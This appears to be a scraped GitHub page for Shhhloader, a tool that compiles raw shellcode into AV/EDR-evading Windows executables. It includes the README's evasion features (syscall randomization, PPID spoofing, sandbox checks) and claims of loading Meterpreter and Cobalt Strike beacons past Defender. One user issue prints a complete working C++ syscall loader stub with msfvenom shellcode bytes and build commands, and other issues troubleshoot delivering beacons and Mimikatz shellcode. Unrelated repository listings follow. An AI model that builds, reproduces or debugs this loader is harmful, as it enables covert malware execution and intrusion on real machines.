SysWhispers Shellcode Loader

Overview

Shhhloader

Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub that has been integrated with SysWhispers in order to bypass AV/EDR. The included python builder will work on any Linux system that has Mingw-w64 installed.

The tool has been confirmed to successfully load Meterpreter and a Cobalt Strike beacon on fully updated systems with Windows Defender enabled. The project itself is still in a PoC/WIP state, as it currently doesn't work with all payloads.

2/9/22 EDIT: Shhhloader now includes 5 different ways to execute your shellcode! See below for updated usage. Big thanks to @Snovvcrash and their DInjector project for inspiration! I highly recommend taking a look at it for more information regarding the shellcode injection techniques and code that this tool is now based on.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ノ   
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-nr] [-v] [-d] [-o a.exe] file

ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -p explorer.exe, --process explorer.exe
                        Process to inject into (Default: explorer.exe)
  -m QueueUserAPC, --method QueueUserAPC
                        Method for shellcode execution (Options: ProcessHollow, QueueUserAPC,
                        RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
  -nr, --no-randomize   Disable syscall name randomization
  -v, --verbose         Enable debugging messages upon execution
  -d, --dll-sandbox     Use DLL based sandbox checks instead of the standard ones
  -o a.exe, --outfile a.exe
                        Name of compiled file

Video Demo: https://www.youtube.com/watch?v=-KLGV_aGYbw

Features:

  • 5 Different Shellcode Execution Methods (ProcessHollow, QueueUserAPC, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
  • PPID Spoofing
  • Block 3rd Party DLLs
  • Syscall Name Randomization
  • XOR Encryption with Dynamic Key Generation
  • Sandbox Evasion via Loaded DLL Enumeration
  • Sandbox Evasion via Checking Processors, Memory, and Time

Tested and Confirmed Working on:

  • Windows 10 21H1 (10.0.19043)
  • Windows 10 20H2 (10.0.19042)
  • Windows Server 2019 (10.0.17763)

Scan Results as of 2/9/22 (x64 Meterpreter QueueUserAPC): https://antiscan.me/scan/new/result?id=tntuLnCkTCwz

Scan

Greetz & Credit:

Comments
  • Error FAILED to allocate memory in the current process, exiting: c000000d

    Error FAILED to allocate memory in the current process, exiting: c000000d

    Hey. For me only ProcessHollow works as shellcode execution method.

    For all the other methods I receive an error while running the generated exe.

    Generating:

    python Shhhloader.py  -p notepad.exe    Payload.raw   -v
    
    ┳┻|
    ┻┳|
    ┳┻|
    ┻┳|
    ┳┻| _
    ┻┳| •.•)  - Shhhhh, AV might hear us!
    ┳┻|⊂ノ
    ┻┳|
    [+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
    [+] Using notepad.exe for QueueUserAPC injection
    [+] Randomizing syscall names
    [+] Verbose messages enabled
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [!] a.exe has been compiled successfully!
    

    Running:

    Please wait 60 seconds...
    Sandbox checks passed
    hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d
    

    :-(

    Injecting in explorer.exe or notepad.exe doesn't make a difference.

    Edit:

    I traced it down to syscall to NtAllocateVirtualMemory. The return value is:

    RAX 00000000C000000D STATUS_INVALID_PARAMETER

    Please help!

    opened by hawaii67 5
  • CurrentThread

    CurrentThread

    hi

    so i managed to only get a cobalt beacon back when using CurrentThread method. i am not sure why the other methods are not working. if you can explain the steps to help. you debug it i will be happy to assist.

    OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.18363 N/A Build 18363

    opened by faheemadam 5
  • GetSyscallStub not working

    GetSyscallStub not working

    Hi. I'm trying a Cobalt Strike (4.7) x64 stageless shellcode, and facing some issues against a Win10 machine with:

    • GetSyscallStub option. When used, I get no beacon
    • EnumDisplayMonitors or ModuleStomping options. When used, I get no beacon

    The only option that works for me is using default 'QueueUserAPC' without GetSyscallStub. Are you aware of these limitations or am I doing something wrong ? My AV is disabled for test purposes and I don't have any EDR either

    Thanks

    opened by qgrosperrin 3
  • llvm obfuscator cause error when compiling!

    llvm obfuscator cause error when compiling!

    First Thanks for your amazing work!

    The previous version was working fine but after the update it started to go wrong, I compiled the llvm following your installation tutorial! I tested if it was the llvm binaries to see if there was something wrong but everything was normal compile other .cpp files correctly Shhhloder1

    Shhhloder2 I am available to send any data or additional information

    opened by T1Cr4azy 2
  • Unable to execute Mimikatz's shellcode

    Unable to execute Mimikatz's shellcode

    Hi, I've played around with the tool since its first release and I really must say that you and your contributors have done a really great job. The tool works fine with CS/Metasploit shellcodes, however it doesn't work with Mimikatz's shellcode (generated from Donut). It does compile successfully, but there is no output displayed when executed (no crashes at all, just no output). I've seen this type of behaviour on other tools as well, maybe it is because of the generated shellcode itself as it is 1.4 million bytes long 🤔

    Looking forward to your answer :)

    opened by kleiton0x00 2
  • x86_64-w64-mingw32-clang++: not found

    x86_64-w64-mingw32-clang++: not found

    +] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER [+] Storing shellcode as english word list [+] Using c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe for ModuleStomping [+] Using GetSyscallStub for syscalls [+] Using domain enumeration for sandbox evasion [+] Generating DLL instead of exe [+] Randomizing syscall names [+] Saved new stub to stub.cpp [+] Compiling new stub... [+] Using Obfuscator-LLVM to compile stub... sh: 1: x86_64-w64-mingw32-clang++: not found [!] Stub compilation failed! Something went wrong!

    Any suggestions?

    opened by MrAnderson0x1 2
  • OLLVM Errors

    OLLVM Errors

    Hey man,

    Getting some OLLVM errors, wonder if you have any tips?

    [+] Using Obfuscator-LLVM to compile stub...
    In file included from stub.cpp:4:
    In file included from /usr/x86_64-w64-mingw32/include/windows.h:69:
    In file included from /usr/x86_64-w64-mingw32/include/windef.h:9:
    In file included from /usr/x86_64-w64-mingw32/include/minwindef.h:163:
    In file included from /usr/x86_64-w64-mingw32/include/winnt.h:1555:
    In file included from /usr/bin/../lib/clang/14.0.6/include/x86intrin.h:15:
    In file included from /usr/bin/../lib/clang/14.0.6/include/immintrin.h:26:
    In file included from /usr/bin/../lib/clang/14.0.6/include/xmmintrin.h:3009:
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2378:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2398:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v16qu)__a, (__v16qu)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2418:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2438:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v16qu)__a, (__v16qu)__b);
    

    Thanks!

    opened by vysecurity 2
  • python2 conversion

    python2 conversion

    Hi there! I am running your script in a py2 environment which I had to change the following line into this:

    test = ''.join(chr(ord(test) ^ ord(key[i])))
    

    which breaks every thing. Do you have any opinion on this? Cheers!

    opened by miralayipouya 1
  • Recommendations

    Recommendations

    Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

    Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

    opened by rotarydrone 1
  • msfvenom alternatives [question]

    msfvenom alternatives [question]

    Hi @icyguider ! hope you are doing well. I am re-creating a tool like msfvenom using python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestion for me on open-source stuff which would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active any more. Cheers!

    opened by miralayipouya 1
  • win7 sp1 or windows server 2008 Test failed can you help me?

    win7 sp1 or windows server 2008 Test failed can you help me?

    • os: Windows 7 sp 1
    //generate payload
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
    //source code
    
    #define _WIN32_WINNT 0x0600
    #include <iostream>
    #include <windows.h>
    #include <psapi.h>
    #include <winternl.h>
    #include <tlhelp32.h>
    #include "Syscalls2.h"
    #ifndef UNICODE  
    typedef std::string String;
    #else
    typedef std::wstring String;
    #endif
    
    
    unsigned char shellcode[276] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
    0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
    0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
    0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
    0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
    0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
    0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
    0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
    0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
    0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
    0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
    0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
    0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
    0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
    0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
    0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
    0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
    0x65,0x78,0x65,0x00,
    };
    
    int main()
    {
        
        HANDLE hProc = GetCurrentProcess();
        DWORD oldprotect = 0;
        PVOID base_addr = NULL;
        HANDLE thandle = NULL;
        SIZE_T bytesWritten;
        size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
        NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (res != 0){
            std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
            return 0;
        }
        else {
            std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
        }
        res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
        if (res != 0){
            std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);
    
        if (res != 0){
            std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);
    
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtResumeThread(thandle, 0);
        if (res != 0){
            std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
        }
        res = NtWaitForSingleObject(thandle, -1, NULL);   
    }
    //build
    x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe
    

    The test is successful in win7 and above

    The output of win7 or windows 2008 is as follows

    NtAllocateVirtualMemory allocated memory in the current process sucessfully.
    NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtCreateThreadEx created thread in current process successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtResumeThread FAILED to resume created thread: c0000022
    
    opened by zhihuba 0
Owner
icyguider
It's sipple out there!
icyguider
This is the official source code for SLATE. We provide the code for the model, the training code, and a dataset loader for the 3D Shapes dataset. This code is implemented in Pytorch.

SLATE This is the official source code for SLATE. We provide the code for the model, the training code and a dataset loader for the 3D Shapes dataset.

Gautam Singh 66 Dec 26, 2022
A Pytorch loader for MVTecAD dataset.

MVTecAD A Pytorch loader for MVTecAD dataset. It strictly follows the code style of common Pytorch datasets, such as torchvision.datasets.CIFAR10. The

Jiyuan 1 Dec 27, 2021
Pytorch ImageNet1k Loader with Bounding Boxes.

ImageNet 1K Bounding Boxes For some experiments, you might wanna pass only the background of imagenet images vs passing only the foreground. Here, I'v

Amin Ghiasi 11 Oct 15, 2022
SysWhispers Shellcode Loader

Shhhloader Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub

icyguider 630 Jan 3, 2023
Shellcode antivirus evasion framework

Schrodinger's Cat Schrodinger'sCat is a Shellcode antivirus evasion framework Technical principle Please visit my blog https://idiotc4t.com/ How to us

idiotc4t 27 Jul 9, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Basic python tools to generate shellcode runner in vba

vba_bin_runner Basic python tools to generate shellcode runner in vba. The stub use ZwAllocateVirtualMemory to allocate memory, RtlMoveMemory to write

null 4 Aug 24, 2021
Shellcode runner to execute malicious payload and bypass AV

buffshark-shellcode-runner Python Shellcode Runner to execute malicious payload and bypass AV This script utilizes mmap(for linux) and win api wrapper

Momo Lenard 9 Dec 29, 2022
C++ fully undetected shellcode launcher

charlotte c++ fully undetected shellcode launcher ;) releasing this to celebrate the birth of my newborn description 13/05/2021: c++ shellcode launche

null 894 Dec 25, 2022
Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20)

x64-shellcode-encoder Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20) Usage Using a generato

Cole Houston 2 Jan 26, 2022
Convert shellcode into :sparkles: different :sparkles: formats!

Bluffy Convert shellcode into ✨ different ✨ formats! Bluffy is a utility which was used in experiments to bypass Anti-Virus products (statically) by f

pre.empt.dev 305 Dec 17, 2022
pip-run - dynamic dependency loader for Python

pip-run provides on-demand temporary package installation for a single interpreter run. It replaces this series of commands (or their Windows equivale

Jason R. Coombs 79 Dec 14, 2022
Basic loader is a small tool that will help you generating Cloudflare cookies

Basic Loader Cloudflare cookies loader This tool may help some people getting valide cloudflare cookies Installation ?? : pip install -r requirements.

IHateTomLrge 8 Mar 30, 2022
IDA file loader for UF2, created for the DEFCON 29 hardware badge

UF2 Loader for IDA The DEFCON 29 badge uses the UF2 bootloader, which conveniently allows you to dump and flash the firmware over USB as a mass storag

Kevin Colley 6 Feb 8, 2022
IDA loader for Apple's iBoot, SecureROM and AVPBooter

IDA iBoot Loader IDA loader for Apple's iBoot, SecureROM and AVPBooter Installation Copy iboot-loader.py to the loaders folder in IDA directory. Credi

matteyeux 74 Dec 23, 2022
Used Insta Loader to download high quality images from instagram account

Insta Dp Downloader Project Description: In this project, I have used "Insta Loader" to download high quality images from instagram account. You only

Hassan Shahzad 3 Oct 31, 2022
This is the official source code for SLATE. We provide the code for the model, the training code, and a dataset loader for the 3D Shapes dataset. This code is implemented in Pytorch.

SLATE This is the official source code for SLATE. We provide the code for the model, the training code and a dataset loader for the 3D Shapes dataset.

Gautam Singh 66 Dec 26, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

null 3 Dec 4, 2022
Single machine, multiple cards training; mix-precision training; DALI data loader.

Template Script Category Description Category script comparison script train.py, loader.py for single-machine-multiple-cards training train_DP.py, tra

null 2 Jun 27, 2022
A Pytorch loader for MVTecAD dataset.

MVTecAD A Pytorch loader for MVTecAD dataset. It strictly follows the code style of common Pytorch datasets, such as torchvision.datasets.CIFAR10. The

Jiyuan 1 Dec 27, 2021